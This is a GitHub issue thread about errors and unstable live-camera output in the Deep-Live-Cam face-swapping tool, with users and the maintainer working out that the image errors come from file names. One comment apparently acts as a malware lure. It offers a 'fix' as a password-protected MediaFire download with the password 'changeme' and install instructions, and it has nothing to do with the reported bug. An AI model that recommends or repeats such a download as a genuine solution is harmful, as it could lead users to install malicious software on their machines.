### ISSUE TITLE
Lots of issues with the latest update to Deep Live Cam

### ISSUE THREAD

**Issue by rickrender** [hacksider/Deep-Live-Cam#523]
I'm noticing I get a lot of 'Attribute Error: 'NoneType' object has no attribute 'shape' errors with image to image swap and image to video swap. These are SFW images with clearly visible landmarks. 

With live video I get blurry/glitchy results like the inswapper model isn't applying correctly. 

The older version with the NSFW switch worked fine. I helped a friend install the latest version on their pc and they also have the same issues, these were both installed in their own virtual envs with all the requirements satisfied and dependencies installed.

I had the older version on my pc with the NSFW switch and did a 'git pull' to be on the new version and troubleshoot the issues he was facing and things just don't work the same as the older version. Live cam will work intermittently if I switch the the alternative inswapper model but the other things like image and video swapping run into the Attribute Error: 'NoneType' object has no attribute 'shape' errors. 

Issues occur with either version of the inswapper model listed on the readme. I'm confused because it was working so well with the old version of the GUI, even the live cam has issues even starting the video feed right now, sometimes it'll just show a gray box with no video at all other times the feed will show with the blurry/glitchy face. 

![output](https://github.com/user-attachments/assets/2f6ceed0-907c-4f0d-9107-6684fe82dd99)

![Screenshot 2024-09-01 153740](https://github.com/user-attachments/assets/e8c12dd6-6f9b-4905-bc09-73761807c375)

-CUDA 11.8 installed on both machines 
-Conda envs with Python 3.10.11 on both machines 
-onnxruntime and other dependencies installed from the requirements.txt with pip install -r requirements.txt 
-Tested with both inswapper versions listed in the Readme

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by avgragmin** [comment]
Check the name of your file as the error states. 
![image](https://github.com/user-attachments/assets/04460afa-4348-4336-994d-1a16232c4647)

**Comment by hacksider** [comment]
The code shouldn't have changed a lot without the nsfw button as it was just commented out.

**Comment by rickrender** [comment]
> The code shouldn't have changed a lot without the nsfw button as it was just commented out.

Thank you guys for your help. That resolves the image loading issue with the ‘no shape’ errors, it is strange that files with underscores in their names worked prior to updates because I was using ai images generated with ComfyUI and they all had underscores, now it always gives that error and requires the simple name like “image.png” as suggested. 

The live cam portion is also intermittently not working though, and this became a persistent issue with the latest changes. Gray box with no image presented. Sometimes it works, other times it doesn’t. 

The install I did for a friend has this issue with file saving even though it was installed with all of the same steps: https://github.com/hacksider/Deep-Live-Cam/issues/395

I appreciate the hard work you’re doing on this and I hope it improves to be more stable in later releases, thank you!

**Comment by hacksider** [comment]
Heads up, I just created a no install package in case you just want to run it without the installation issues.
